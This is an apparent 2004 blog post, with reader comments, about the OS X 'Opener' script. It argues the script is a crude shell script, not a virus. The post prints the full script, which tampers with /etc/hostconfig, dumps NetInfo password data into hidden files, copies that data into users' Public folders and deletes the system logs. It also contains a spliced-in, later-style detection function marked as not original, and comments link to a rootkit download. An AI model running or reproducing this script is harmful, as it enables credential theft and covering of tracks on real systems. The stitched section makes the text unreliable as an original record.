
opener: fake virus or spyware on OSX

Posted by deepquest on October 26, 2004 – 3:35 pm

I hesitated to post about this subject, but after seeing all the crappy details posted and relayed by the media, I decided to provide more details to show that this is not a virus and not spyware, just a script targeting dummies and warez downloaders.

Let’s start from the beginning. As you may have noticed already, I’m some kind of dummy when it comes to computers, and I tried to find a clear explanation of what a virus is. So I went to [url=http://computer.howstuffworks.com/virus2.htm]How Stuff Works[/url], and I found that “A computer virus must piggyback on top of some other program or document in order to get executed. Once it is running, it is then able to infect other programs or documents”.

So here is the evil code for “Opener”:

SAVE THIS AS A TEXT FILE CALLED opener
#! /bin/sh
# unlock and replace the boot-time /etc/hostconfig with the copy shipped in the StartupItem
chmod 777 /etc/hostconfig
chflags nouchg /etc/hostconfig
mv /etc/hostconfig /etc/hostconfigold.old
cp /Library/StartupItems/opener/hostconfig /etc/hostconfig
# gather password-server, web-server and system database files into /.info
cp -R /Library/ApplePasswordServer /.info/Library/ApplePasswordServer
cp /Library/WebServer/users /.info/Library/WebServer/users
cp /System/Library/CoreServices/SystemVersion.plist /.infoSystem/Library/CoreServices/SystemVersion.plist
cp -R /private/var/db /.info/private/var/db
# dump the NetInfo password database (local and network domains) into hidden files
cd /.info
nidump passwd . > .nidump.txt
nidump passwd / > .nidump2.txt
chmod -R 777 /.info
# drop a copy of the collected data into every user's Public folder
cd /Users
find . -maxdepth 2 -name "Public" -type d -exec sudo cp -R /.info '{}/.info' \;
# wipe the system and library logs
rm -Rf /private/var/log/
rm -Rf /Library/Logs/

Haven’t you noticed something? #! /bin/sh? Does it sound familiar to some of you? If not, #! /bin/sh marks a Unix shell script; for Windows users, it is the equivalent of a .bat file, a DOS script on Windows. That’s the virus, a Unix shell script? It seems like the cream of the cream of IT journalists such as [url=mailto:damian@itweb.co.za]Damian Clarkso[/url], [url=http://software.silicon.com/malware/0,3800003100,39125245,00.htm]Munir Kotadia[/url] and [url=http://www.eweek.com/article2/0,1759,1682846,00.asp]Ian Betteridge[/url] should spend more time on sites such as [url=computer.howstuffworks.com]How computer stuff works[/url].
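As an added, defender-side illustration (this is not code from the original post, and the function name and root argument are my own choices), the following POSIX sh function checks a live system or a mounted disk image for the traces the script above leaves behind: the /.info staging directory and the nidump output in it, the opener StartupItem, the renamed and world-writable hostconfig, copies dropped into users’ Public folders, and the two deleted log directories. Its return value is the number of indicators found, so zero means nothing matched.

```shell
#!/bin/sh
# Added example, not from the original post: a read-only check for the
# traces the "opener" script leaves behind. Pass the root of the filesystem
# to inspect (a mount point for an image, or / for the live system).
# Prints one line per finding; the return value is the number of findings.
check_opener_artifacts() {
    root="$1"
    findings=0
    note() { echo "FOUND: $1"; findings=$((findings + 1)); }

    # Staging directory the script creates, and the NetInfo dumps it writes there
    [ -d "$root/.info" ] && note "staging directory $root/.info"
    [ -f "$root/.info/.nidump.txt" ] && note "password dump $root/.info/.nidump.txt"
    [ -f "$root/.info/.nidump2.txt" ] && note "password dump $root/.info/.nidump2.txt"

    # StartupItem directory the script copies its replacement hostconfig from
    [ -d "$root/Library/StartupItems/opener" ] && note "StartupItem $root/Library/StartupItems/opener"

    # The original hostconfig is renamed and the replacement is left at mode 777
    [ -e "$root/etc/hostconfigold.old" ] && note "renamed original $root/etc/hostconfigold.old"
    if [ -f "$root/etc/hostconfig" ]; then
        mode=$(ls -ld "$root/etc/hostconfig" | cut -c1-10)
        [ "$mode" = "-rwxrwxrwx" ] && note "$root/etc/hostconfig is world-writable ($mode)"
    fi

    # A copy of /.info dropped into every user's Public folder
    for d in "$root"/Users/*/Public/.info; do
        [ -d "$d" ] && note "copied staging directory $d"
    done

    # The script deletes both log directories outright; their absence is itself a sign
    [ -d "$root/private/var/log" ] || note "log directory $root/private/var/log is missing"
    [ -d "$root/Library/Logs" ] || note "log directory $root/Library/Logs is missing"

    return "$findings"
}

# Usage: sh opener_check.sh /Volumes/suspect   (exit status = number of findings)
[ $# -gt 0 ] && check_opener_artifacts "$1"
```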

Why isn’t it a virus?
-It doesn’t self-propagate.
-It doesn’t use any exploit such as a buffer overflow.
-It doesn’t use any shellcode.
-It doesn’t infect or destroy any files.
-It doesn’t use any security weakness.

Please feel free to add more to that list!


This post is filed under “Apple”.


  1. mac-geek Said:

    here’s the real code for opener ( http://freaky.staticusers.net/ugboard/viewtopic.php?t=10712&start=120&sid=d21270b46d24664177238b539b4b4495 ). Virus no, trojan maybe, it does replicate itself.

  2. MAc_geek Said:

    ok how about a rootkit then. If not then it’s definitely part of a rootkit at least:

    http://packetstormsecurity.org/UNIX/penetration/rootkits/osxrk-0.2.1.tbz

  3. deepquest Said:

    not even a trojan, a trojan requiring admin rights isn’t really one :-)

    Thanks Mac-Geek for pointing to the original source/url.

  4. neil Said:

    Another rootkit for OS X. This one is just a proof of concept.

  5. neil Said:

    oops

    http://neil.slampt.net/

  6. deepquest Said:

    finally interesting rootkit 😉
